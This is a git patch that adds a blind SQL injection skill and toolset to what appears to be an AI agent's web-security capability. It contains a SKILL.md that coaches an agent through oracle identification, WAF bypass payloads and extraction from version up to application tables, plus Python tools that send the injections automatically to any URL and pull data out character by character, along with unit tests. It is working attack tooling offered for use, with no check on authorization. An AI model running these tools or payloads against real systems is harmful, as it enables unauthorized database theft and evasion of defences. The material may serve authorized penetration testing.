From 23d9b6b8911625b1ceb517e453bf28b5d8c897fd Mon Sep 17 00:00:00 2001 From: GangGreenTemperTatum <104169244+GangGreenTemperTatum@users.noreply.github.com> Date: Fri, 26 Jun 2026 10:52:15 -0400 Subject: [PATCH] Add blind SQLi extraction skill and tool to web-security capability Skill: boolean/timing-based blind SQLi methodology with oracle identification, WAF bypass patterns, and extraction techniques. Tool: BlindSQLiTools Toolset with sqli_test_condition, sqli_extract_string, sqli_extract_int for automated extraction via LIKE char-by-char and DIV narrowing. 15 tests. --- .../skills/blind-sqli-extraction/SKILL.md | 145 ++++++++ .../web-security/tests/test_blind_sqli.py | 93 +++++ capabilities/web-security/tools/blind_sqli.py | 347 ++++++++++++++++++ 3 files changed, 585 insertions(+) create mode 100644 capabilities/web-security/skills/blind-sqli-extraction/SKILL.md create mode 100644 capabilities/web-security/tests/test_blind_sqli.py create mode 100644 capabilities/web-security/tools/blind_sqli.py diff --git a/capabilities/web-security/skills/blind-sqli-extraction/SKILL.md b/capabilities/web-security/skills/blind-sqli-extraction/SKILL.md new file mode 100644 index 0000000..5c5acf0 --- /dev/null +++ b/capabilities/web-security/skills/blind-sqli-extraction/SKILL.md @@ -0,0 +1,145 @@ +--- +name: blind-sqli-extraction +description: "Extract data from boolean and timing-based blind SQL injection points. Use when you have a confirmed injection point with a reliable oracle but no direct output — covers oracle identification, WAF bypass, and efficient extraction via LIKE narrowing and DIV bisection." +--- + +# Blind SQLi Extraction + +You have confirmed SQL injection. The application does not return query results directly. You need to extract data one condition at a time through a boolean or timing oracle. + +## Pattern + +- Injectable parameter confirmed (boolean differential or timing differential) +- No UNION/error-based output available +- Need to extract version, user, schema, or application data +- WAF may block common keywords or quote characters + +## Workflow + +### 1. Identify the Oracle + +The oracle is the observable difference between TRUE and FALSE conditions. Find it before extracting anything. + +| Oracle Type | Signal | Example | +|---|---|---| +| Boolean (response body) | JSON field value changes, result count differs, content present/absent | `paging.total = 5` (TRUE) vs `paging.total = 0` (FALSE) | +| Boolean (status code) | 200 vs 500, 200 vs 302 | Inject `' AND 1=1--` vs `' AND 1=0--` | +| Boolean (response size) | Byte count delta >10 bytes | TRUE returns full page, FALSE returns empty/error | +| Timing | Response time delta >2s | `' AND IF(1=1,SLEEP(3),0)--` vs baseline | + +**Validation:** Always confirm with a known-true (`1=1`) and known-false (`1=0`) pair before extraction. If both return the same oracle value, the injection point is not usable. + +### 2. Map WAF Restrictions + +Before building payloads, identify what the WAF blocks. Test each element independently: + +``` +Quotes: ' " ` (try hex 0x encoding as bypass) +Whitespace: SPACE TAB (try /**/ or %09) +Keywords: SELECT UNION WHERE AND OR (try case mixing, inline comments) +Functions: SLEEP BENCHMARK IF CASE SUBSTRING (try aliases) +Operators: = < > (try LIKE, BETWEEN, DIV) +Comments: -- # /**/ (try ;%00) +``` + +### 3. Extract Data + +Use the `BlindSQLiTools` toolset. Three extraction methods available: + +- `sqli_test_condition` -- test a single boolean condition +- `sqli_extract_string` -- character-by-character string extraction via LIKE +- `sqli_extract_int` -- integer extraction via DIV narrowing + +Start with version and user identification, then enumerate schema, then extract target data. + +**Extraction order:** +1. `@@version` -- confirms DBMS and informs syntax choices +2. `CURRENT_USER` or `user()` -- identifies privilege level +3. Schema enumeration -- `information_schema.tables`, `information_schema.columns` +4. Target data -- application-specific tables + +## WAF Bypass Patterns + +| Blocked | Bypass | Notes | +|---|---|---| +| Single quotes `'` | `0x` hex encoding | `'admin'` becomes `0x61646d696e` | +| `SPACE` | Inline comment `/**/` | `AND/**/1=1` | +| `SPACE` | Tab `%09` or newline `%0a` | `AND%091=1` | +| `AND` / `OR` | `&&` / `\|\|` | MySQL only | +| `AND` / `OR` | Case mixing `AnD` | Some WAFs are case-sensitive | +| `SELECT` | `/*!50000SELECT*/` | MySQL version-conditional comments | +| `=` | `LIKE` or `BETWEEN...AND` | `@@version LIKE 0x382e30%` | +| `SUBSTRING` | `MID()` or `LEFT()`/`RIGHT()` | MySQL alternatives | +| `SLEEP` | `BENCHMARK(5000000,SHA1('x'))` | CPU-based timing alternative | +| `IF()` | `CASE WHEN...THEN...ELSE...END` | ANSI SQL, broader compat | +| Comma `,` | `CASE WHEN` instead of `IF(x,y,z)` | Also `LIMIT 1 OFFSET 0` instead of `LIMIT 0,1` | +| `information_schema` | `sys.schema_table_statistics` | MySQL 5.7+ alternative | + +### Stacked Bypass (MySQL) + +When inline injection is blocked, version-conditional comments can wrap entire clauses: + +```sql +/*!50000CASE*/+WHEN+{condition}+THEN+0+ELSE+1+/*!50000END*/ +``` + +### Quote-Free String Comparison + +Hex encoding eliminates quotes entirely: + +```sql +@@version=0x382e302e3137 -- tests if version equals '8.0.17' +user() LIKE 0x726f6f7425 -- tests if user starts with 'root' +``` + +## Extraction Techniques + +### LIKE Character-by-Character + +Extract strings one character at a time using LIKE with wildcard: + +``` +@@version LIKE 0x38% -- starts with '8'? TRUE +@@version LIKE 0x382e% -- starts with '8.'? TRUE +@@version LIKE 0x382e30% -- starts with '8.0'? TRUE +``` + +Worst case: 70 requests per character (full charset). Average: ~35 per character. + +### DIV Integer Narrowing + +Extract integers by narrowing thousands, hundreds, tens, then exact: + +``` +@@port DIV 1000=3 -- port is 3000-3999? TRUE +@@port DIV 100=33 -- port is 3300-3399? TRUE +@@port DIV 10=330 -- port is 3300-3309? TRUE +@@port=3306 -- port is 3306? TRUE +``` + +Total: 30-96 requests regardless of value magnitude. Far more efficient than character extraction for numbers. + +### Known-Value Shortcut + +When extracting from a finite set (version strings, usernames, table names), test exact matches first: + +``` +@@version=0x382e302e3137 -- '8.0.17'? FALSE +@@version=0x382e302e3333 -- '8.0.33'? TRUE (1 request instead of 35+) +``` + +Pass common values via `known_values` parameter to try before falling back to character extraction. + +## Indicators + +- **Oracle confirmed:** Known-true and known-false conditions produce reliably different oracle values +- **Extraction working:** Extracted value is confirmed with exact-match test after LIKE narrowing +- **WAF bypassed:** Payloads return expected oracle responses instead of WAF block pages +- **Privilege identified:** `CURRENT_USER` extraction reveals the database account and privilege level + +## Chain With + +- **timing-attack-recon** -- discover the injection point via timing differentials +- **parser-differential-bypass** -- WAF bypass via encoding differentials between WAF parser and backend DB +- **403-bypass** -- access blocked endpoints that may have weaker input validation +- **data-exfil** -- exfiltrate extracted data through OOB channels when boolean oracle is unreliable diff --git a/capabilities/web-security/tests/test_blind_sqli.py b/capabilities/web-security/tests/test_blind_sqli.py new file mode 100644 index 0000000..4724ed0 --- /dev/null +++ b/capabilities/web-security/tests/test_blind_sqli.py @@ -0,0 +1,93 @@ +"""Tests for the blind SQLi extraction tools.""" + +from __future__ import annotations + +import importlib.util +from pathlib import Path + +import pytest + +MODULE_PATH = Path(__file__).resolve().parent.parent / "tools" / "blind_sqli.py" +SPEC = importlib.util.spec_from_file_location("blind_sqli", MODULE_PATH) +assert SPEC and SPEC.loader +MODULE = importlib.util.module_from_spec(SPEC) +SPEC.loader.exec_module(MODULE) + +BlindSQLiTools = MODULE.BlindSQLiTools +_resolve_field = MODULE._resolve_field + + +@pytest.fixture +def toolset() -> BlindSQLiTools: + return BlindSQLiTools() + + +class TestToolDiscovery: + def test_tools_class_exists(self) -> None: + assert hasattr(MODULE, "BlindSQLiTools") + + def test_is_toolset(self) -> None: + from dreadnode.agents.tools import Toolset + + assert issubclass(BlindSQLiTools, Toolset) + + def test_tool_methods_registered(self, toolset: BlindSQLiTools) -> None: + tools = toolset.get_tools() + names = {t.name for t in tools} + assert names == { + "sqli_test_condition", + "sqli_extract_string", + "sqli_extract_int", + "sqli_get_request_count", + "sqli_reset", + } + + +class TestDefaultConfig: + def test_timeout(self, toolset: BlindSQLiTools) -> None: + assert toolset.timeout == 30 + + def test_delay(self, toolset: BlindSQLiTools) -> None: + assert toolset.delay == 0.3 + + def test_max_length(self, toolset: BlindSQLiTools) -> None: + assert toolset.max_length == 80 + + +class TestResolveField: + def test_simple_field(self) -> None: + assert _resolve_field({"count": 5}, "count") == 5 + + def test_nested_field(self) -> None: + assert _resolve_field({"paging": {"total": 10}}, "paging.total") == 10 + + def test_list_index(self) -> None: + assert _resolve_field({"items": [1, 2, 3]}, "items.1") == 2 + + def test_missing_field(self) -> None: + assert _resolve_field({"a": 1}, "b") is None + + def test_missing_nested(self) -> None: + assert _resolve_field({"a": {"b": 1}}, "a.c") is None + + def test_list_out_of_bounds(self) -> None: + assert _resolve_field({"items": [1]}, "items.5") is None + + def test_non_dict_traversal(self) -> None: + assert _resolve_field({"a": "string"}, "a.b") is None + + +class TestRequestCount: + @pytest.mark.asyncio + async def test_initial_count_zero(self, toolset: BlindSQLiTools) -> None: + result = await toolset.get_request_count() + assert "0" in result + + @pytest.mark.asyncio + async def test_reset_clears_count(self, toolset: BlindSQLiTools) -> None: + # Ensure _client is properly None (not a PrivateAttr sentinel) + toolset.__dict__["_request_count"] = 42 + toolset.__dict__["_client"] = None + result = await toolset.reset() + assert "0" in result + assert toolset._request_count == 0 diff --git a/capabilities/web-security/tools/blind_sqli.py b/capabilities/web-security/tools/blind_sqli.py new file mode 100644 index 0000000..ff28c6e --- /dev/null +++ b/capabilities/web-security/tools/blind_sqli.py @@ -0,0 +1,347 @@ +"""Blind SQL injection extraction toolkit for boolean/timing-based blind SQLi. + +Provides character-by-character string extraction (LIKE narrowing), integer +extraction (DIV bisection), and single-condition testing through a configurable +boolean oracle. Supports hex-encoded payloads for WAF bypass. +""" + +from __future__ import annotations + +import asyncio +import json +import urllib.parse +from typing import Annotated + +import httpx +from dreadnode.agents.tools import Toolset, tool_method +from pydantic import PrivateAttr + + +class BlindSQLiTools(Toolset): + """Boolean and timing-based blind SQL injection extraction. + + Configure a boolean oracle (JSON field path + threshold) and extract + data from injectable parameters using LIKE narrowing (strings) or + DIV bisection (integers). + """ + + timeout: int = 30 + """HTTP request timeout in seconds.""" + delay: float = 0.3 + """Delay between requests in seconds to avoid rate limiting.""" + max_length: int = 80 + """Maximum string length to extract before stopping.""" + + _client: httpx.AsyncClient | None = PrivateAttr(default=None) + _request_count: int = PrivateAttr(default=0) + + def _ensure_client(self) -> httpx.AsyncClient: + """Ensure persistent HTTP client exists.""" + if self._client is None: + self._client = httpx.AsyncClient(timeout=self.timeout) + return self._client + + @tool_method(name="sqli_test_condition", catch=True) + async def test_condition( + self, + url: Annotated[str, "Full URL with the injectable parameter value replaced by {PAYLOAD}"], + payload_template: Annotated[ + str, + "SQL payload template with {condition} placeholder, " + "e.g. \"value'+CASE WHEN {condition} THEN 0 ELSE 1 END+'\"", + ], + condition: Annotated[str, "SQL condition to test, e.g. '1=1' or '@@version LIKE 0x38%'"], + oracle_field: Annotated[ + str, + "Dot-notation JSON field path that signals TRUE when >= threshold, e.g. 'paging.total'", + ], + oracle_threshold: Annotated[int, "Minimum value of oracle_field that indicates TRUE"] = 1, + method: Annotated[str, "HTTP method"] = "GET", + headers: dict[str, str] | None = None, + auth_header: Annotated[str | None, "Authorization header value"] = None, + ) -> str: + """Test a single boolean condition via blind SQLi oracle. + + Builds the injection payload from the template and condition, + sends the request, and evaluates the oracle field to determine + TRUE or FALSE. + + Returns a human-readable result showing the condition tested + and whether it evaluated to TRUE or FALSE. + """ + self._request_count += 1 + payload = payload_template.format(condition=condition) + target_url = url.replace("{PAYLOAD}", urllib.parse.quote(payload, safe="")) + + req_headers = dict(headers or {}) + if auth_header: + req_headers["Authorization"] = auth_header + + client = self._ensure_client() + + try: + response = await client.request(method.upper(), target_url, headers=req_headers) + data = response.json() + + val = _resolve_field(data, oracle_field) + if val is None: + return f"ORACLE ERROR: field '{oracle_field}' not found in response\nCondition: {condition}\nRequests: {self._request_count}" + + is_true = int(val) >= oracle_threshold + return ( + f"Condition: {condition}\n" + f"Result: {'TRUE' if is_true else 'FALSE'}\n" + f"Oracle: {oracle_field} = {val} (threshold: {oracle_threshold})\n" + f"Requests: {self._request_count}" + ) + + except httpx.TimeoutException: + return ( + f"TIMEOUT after {self.timeout}s (may indicate TRUE for time-based oracles)\n" + f"Condition: {condition}\n" + f"Requests: {self._request_count}" + ) + except (json.JSONDecodeError, KeyError, TypeError, ValueError) as e: + return f"ORACLE ERROR: {e}\nCondition: {condition}\nRequests: {self._request_count}" + + @tool_method(name="sqli_extract_string", catch=True) + async def extract_string( + self, + url: Annotated[str, "Full URL with {PAYLOAD} placeholder for the injectable parameter"], + payload_template: Annotated[str, "SQL payload template with {condition} placeholder"], + expression: Annotated[str, "SQL expression to extract, e.g. '@@version' or 'CURRENT_USER'"], + oracle_field: Annotated[str, "Dot-notation JSON field for boolean oracle"], + oracle_threshold: Annotated[int, "Minimum oracle value for TRUE"] = 1, + known_values: Annotated[ + str | None, "Comma-separated known values to try first (saves requests)" + ] = None, + charset: Annotated[ + str | None, "Character set to search (default: alphanumeric + common symbols)" + ] = None, + hex_encode: Annotated[ + bool, "Use 0x hex encoding for string comparisons (bypasses quote-blocking WAFs)" + ] = True, + method: Annotated[str, "HTTP method"] = "GET", + headers: dict[str, str] | None = None, + auth_header: Annotated[str | None, "Authorization header value"] = None, + ) -> str: + """Extract a string value character-by-character via boolean blind SQLi. + + Uses LIKE with hex-encoded patterns to extract values one character + at a time. Tries known_values first as an optimization. + + Returns the extracted value with match type (exact, prefix, or max length). + """ + if charset is None: + # '.' before '_' because '_' is a LIKE wildcard and must be tested carefully + charset = "abcdefghijklmnopqrstuvwxyz0123456789-./ABCDEFGHIJKLMNOPQRSTUVWXYZ:_ @" + + start_count = self._request_count + + # Try known values first (exact match, saves many requests) + if known_values: + for val in known_values.split(","): + val = val.strip() + if hex_encode: + cond = f"{expression}=0x{val.encode().hex()}" + else: + cond = f"{expression}='{val}'" + + await asyncio.sleep(self.delay) + result = await self._check_condition( + url, payload_template, cond, oracle_field, oracle_threshold, + method, headers, auth_header, + ) + if result: + return ( + f"Extracted: {expression} = {val}\n" + f"Match: exact (known value)\n" + f"Requests: {self._request_count - start_count}" + ) + + # Character-by-character extraction via LIKE + current = "" + for _ in range(self.max_length): + found = False + for ch in charset: + await asyncio.sleep(self.delay) + pattern = current + ch + "%" + if hex_encode: + cond = f"{expression} LIKE 0x{pattern.encode().hex()}" + else: + cond = f"{expression} LIKE '{pattern}'" + + result = await self._check_condition( + url, payload_template, cond, oracle_field, oracle_threshold, + method, headers, auth_header, + ) + if result: + current += ch + found = True + break + + if not found: + # Verify with exact match + await asyncio.sleep(self.delay) + if hex_encode: + cond = f"{expression}=0x{current.encode().hex()}" + else: + cond = f"{expression}='{current}'" + exact = await self._check_condition( + url, payload_template, cond, oracle_field, oracle_threshold, + method, headers, auth_header, + ) + match_type = "exact" if exact else "prefix" + return ( + f"Extracted: {expression} = {current}\n" + f"Match: {match_type}\n" + f"Requests: {self._request_count - start_count}" + ) + + return ( + f"Extracted: {expression} = {current}\n" + f"Match: max length reached\n" + f"Requests: {self._request_count - start_count}" + ) + + @tool_method(name="sqli_extract_int", catch=True) + async def extract_int( + self, + url: Annotated[str, "Full URL with {PAYLOAD} placeholder"], + payload_template: Annotated[str, "SQL payload template with {condition} placeholder"], + expression: Annotated[str, "SQL expression to extract, e.g. '@@port' or 'LENGTH(user())'"], + oracle_field: Annotated[str, "Dot-notation JSON field for boolean oracle"], + oracle_threshold: Annotated[int, "Minimum oracle value for TRUE"] = 1, + low: Annotated[int, "Minimum expected value"] = 0, + high: Annotated[int, "Maximum expected value"] = 65535, + method: Annotated[str, "HTTP method"] = "GET", + headers: dict[str, str] | None = None, + auth_header: Annotated[str | None, "Authorization header value"] = None, + ) -> str: + """Extract an integer value via DIV narrowing (30-96 requests). + + Narrows the range progressively: thousands, hundreds, tens, exact. + Much faster than character-by-character for numeric values. + """ + start_count = self._request_count + + # Narrow by thousands + for k in range(high // 1000 + 1): + await asyncio.sleep(self.delay) + result = await self._check_condition( + url, payload_template, f"{expression} DIV 1000={k}", + oracle_field, oracle_threshold, method, headers, auth_header, + ) + if result: + low, high = k * 1000, (k + 1) * 1000 - 1 + break + + # Narrow by hundreds + for k in range(low // 100, high // 100 + 1): + await asyncio.sleep(self.delay) + result = await self._check_condition( + url, payload_template, f"{expression} DIV 100={k}", + oracle_field, oracle_threshold, method, headers, auth_header, + ) + if result: + low, high = k * 100, (k + 1) * 100 - 1 + break + + # Narrow by tens + for k in range(low // 10, high // 10 + 1): + await asyncio.sleep(self.delay) + result = await self._check_condition( + url, payload_template, f"{expression} DIV 10={k}", + oracle_field, oracle_threshold, method, headers, auth_header, + ) + if result: + low, high = k * 10, (k + 1) * 10 - 1 + break + + # Exact value + for v in range(low, high + 1): + await asyncio.sleep(self.delay) + result = await self._check_condition( + url, payload_template, f"{expression}={v}", + oracle_field, oracle_threshold, method, headers, auth_header, + ) + if result: + return ( + f"Extracted: {expression} = {v}\n" + f"Match: exact\n" + f"Requests: {self._request_count - start_count}" + ) + + return ( + f"Extracted: {expression} = None (not found in range)\n" + f"Requests: {self._request_count - start_count}" + ) + + @tool_method(name="sqli_get_request_count", catch=True) + async def get_request_count(self) -> str: + """Get the total number of SQLi extraction requests sent this session.""" + return f"Total SQLi requests: {self._request_count}" + + @tool_method(name="sqli_reset", catch=True) + async def reset(self) -> str: + """Reset the request counter and HTTP client. + + Use between extraction targets or when switching injection points. + """ + self._request_count = 0 + if self._client is not None: + await self._client.aclose() + self._client = None + return "SQLi extractor reset. Request count: 0." + + async def _check_condition( + self, + url: str, + payload_template: str, + condition: str, + oracle_field: str, + oracle_threshold: int, + method: str, + headers: dict[str, str] | None, + auth_header: str | None, + ) -> bool: + """Send request and return boolean oracle result.""" + self._request_count += 1 + payload = payload_template.format(condition=condition) + target_url = url.replace("{PAYLOAD}", urllib.parse.quote(payload, safe="")) + + req_headers = dict(headers or {}) + if auth_header: + req_headers["Authorization"] = auth_header + + client = self._ensure_client() + + try: + response = await client.request(method.upper(), target_url, headers=req_headers) + data = response.json() + + val = _resolve_field(data, oracle_field) + if val is None: + return False + return int(val) >= oracle_threshold + + except (httpx.TimeoutException, json.JSONDecodeError, KeyError, TypeError, ValueError): + return False + + +def _resolve_field(data: object, field_path: str) -> object | None: + """Resolve a dot-notation field path in nested JSON data.""" + val = data + for part in field_path.split("."): + if isinstance(val, dict): + if part not in val: + return None + val = val[part] + elif isinstance(val, list) and part.isdigit(): + idx = int(part) + if idx >= len(val): + return None + val = val[idx] + else: + return None + return val